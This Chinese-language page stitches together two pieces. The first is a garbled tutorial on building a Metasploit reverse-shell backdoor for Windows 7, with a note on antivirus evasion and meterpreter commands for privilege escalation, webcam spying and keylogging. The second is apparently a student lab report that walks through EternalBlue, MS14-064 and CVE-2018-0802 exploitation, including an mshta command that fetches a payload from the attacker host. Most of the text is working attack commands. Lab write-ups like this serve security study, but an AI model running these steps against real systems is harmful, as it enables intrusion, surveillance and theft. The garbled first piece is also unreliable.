如何利用metasploit进行漏洞扫描和攻击

Posted 2023-03-20

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣，针对这些以下业内相关专家就给大家介绍下，当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为：cn_win7_x86_7601虚拟机，地址为：192.168.0.116；而本地主机就为：192.168.0.149。方法步骤一：黑客用Msfpayload直接生成相关的后门程序，如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149x>steup.exe方法步骤二：黑客直接就能进入所在的目录并将属性进行修改，换为允许以程序执行文件，详细如下图。进入所在目录，修改属性：选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三：接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机，最后就能开始进行监听了，详细情况如下图。打开msfconsole，加载exploit/multi/handler模块，设置本地主机；然后开始监听：exploit-z-j：方法步骤四：黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步骤五：以上步骤全部完成后黑客就能通过后门程序反向连接到msf，用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf，详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块，因此的话溢出成功后黑客就能攻击载荷进行使用，一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道，这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外，附meterpreter常用命令：getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景，需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘 参考技术A 免费版本的是没有自动攻击而商业版本的有全自动自动攻击

Exp5 MSF基础应用

Exp5 MSF基础应用

5.1 实验内容

本次实验主要是掌握metasploit的基本应用，主要是按三种思路来进行实验，比较接近正常情况下的漏洞利用。同时在漏洞利用过程中出现了我们听过的漏洞和常用软件的漏洞利用。
主要实验内容：

1. 利用操作系统漏洞进行主动攻击，本次实验是windows的ms17-010漏洞进行利用
2. 针对浏览器的漏洞进行利用，本次实验是利用MS14-064漏洞入侵win7系统
3. 针对客户端漏洞的攻击，本次实验是利用office的CVE-2018-0802漏洞进行的攻击
4. 成功应用任何一个辅助模块

5.2实验步骤

5.2.1 一个主动攻击实践--利用ms17-010漏洞对Windows主机的攻击

基本配置

• 攻击机 kail linux
• 靶机 windows server 2008 R2

具体操作

• 首先输入指令msfconsole进入到控制台
• 配置exploit选项，这里利用的ms17-010漏洞（也就是永恒之蓝利用的漏洞）输入命令msf > use exploit/windows/smb/ms17_010_eternalblue，然后就是设置靶机ip的命令set rhost 192.168.92.130。

• 然后继续对payload进行配置，配置攻击机监听返回会话，输入命令set payload windows/x64/meterpreter/reverse_tcp设置payload，然后设置 set lhost 192.168.92.128设定攻击机的监听，最后exploit进行攻击。
  

• 可以看到，成功获得靶机系统操作。
  

5.2.2 一个针对浏览器的攻击--利用MS14-064漏洞对win7的攻击

基本配置

• 攻击机 kali linux
• 靶机 Windows7 x64

具体操作

• 攻击方式相近，首先进入msfconsole控制台中
• 输入use exploit/windows/browser/ms14_064_ole_code_execution设置MS14-064漏洞利用模块
• set payload windows/meterpreter/reverse_tcp设置payload
• set SRVHOST 192.168.92.128设置攻击机监听
• set AllowPowerShellPrompt true这个是因为需要用到windows中自带的powershell
• set lport 5103设置端口

• set lhost 192.168.92.128设置攻击机ip
  

• exploit开始，生成网址链接http://192.168.92.128:8080/R8TaLT

• 复制链接，靶机在浏览器中输入链接后，攻击机攻击成功。
  

5.2.3 一个针对客户端的攻击--利用office存在中的CVE-2018-0802漏洞进行攻击

基本配置

• 攻击机 kali linux
• 靶机 windows10 office2013

具体操作

• 还是打开msfconsole，使用攻击模块use exploit/windows/misc/hta_server
• set LHOST 192.168.92.128设置攻击机
• set LPORT 5103
• set SRVHOST 192.168.92.128

• set target 1设置目标（由于是x64所以是1）
  

• 使用exploit生成hta链接
  

• 从网上下载关于此漏洞poc文件，使用python RTF_11882_0802.py -c "mshta http://192.168.92.128:8080/sBeLshqkj59n.hta" -o Password5103.doc生成doc文件
  
  

• 将doc文件拷到我的win10中，打开文件
  

• 这边kali成功获得了我这的操作权限。
  

5.2.4 辅助模块

-进入控制台直接可以输入search portscan来看看我们可以用哪些辅助模块来进行端口扫描

• 这里用的还是auxiliary/scanner/portscan/tcp 模块
  

• 然后设置一下目标ip就可以开始端口扫描了
  

• 这里实际上我扫过我的win7发现半天没反应，后来发现跟防火墙有关系。

5.3 基础问题回答

什么是exploit,payload,encode

• exploit是攻击的一套运行模块，负责基于核心模块给出传输及功能实现。
• payload是攻击的核心，在攻击中主要起做用的部分，针对不同的漏洞利用不同的paylaod进行攻击。攻击时放入到靶机中执行。
• encode 也是msf的一个模块，这这个模块主要负责编码，将payload处理成目标机可执行，去掉坏字符，不会被检测到（免杀）的代码。

实践总结与体会

本次实验确实感触很深，由于做实验时间较晚，因此在做实验的时候在网上找了不少关于漏洞的资料，也让自己开了开眼，发现好多以前听说过的知名网安事件所利用的漏洞在自己的操作下也可以成功实施攻击。不过不少漏洞在安全人员的辛苦工作下还是把漏洞限制在了特定的软件或操作系统版本中才能被利用。在进行客户端攻击中，发现自己常用的软件客户端的漏洞被利用也非常的令人后背发凉，不过好在是也会被杀软查出来，但是针对0day漏洞还是很难被发现，因此，我们还是得好好钻研知识，提高安全意识，当然挖掘漏洞也是我们应该认真去尝试的！

离实战还缺些什么技术或步骤？

在我看来，目前在实战方面还需要考虑的就是我们如何去找到别人的用户端，然后从外网想办法去绕过防火墙来进行攻击。但是事实上对于不同的安全系统所采用的安全等级肯定不一样（我这里的意思是因人而异）如果你要进入到跟你同一网段而且平时没什么安全意识的人的电脑中感觉还是蛮容易的。。。。（但是这样是会违法的！）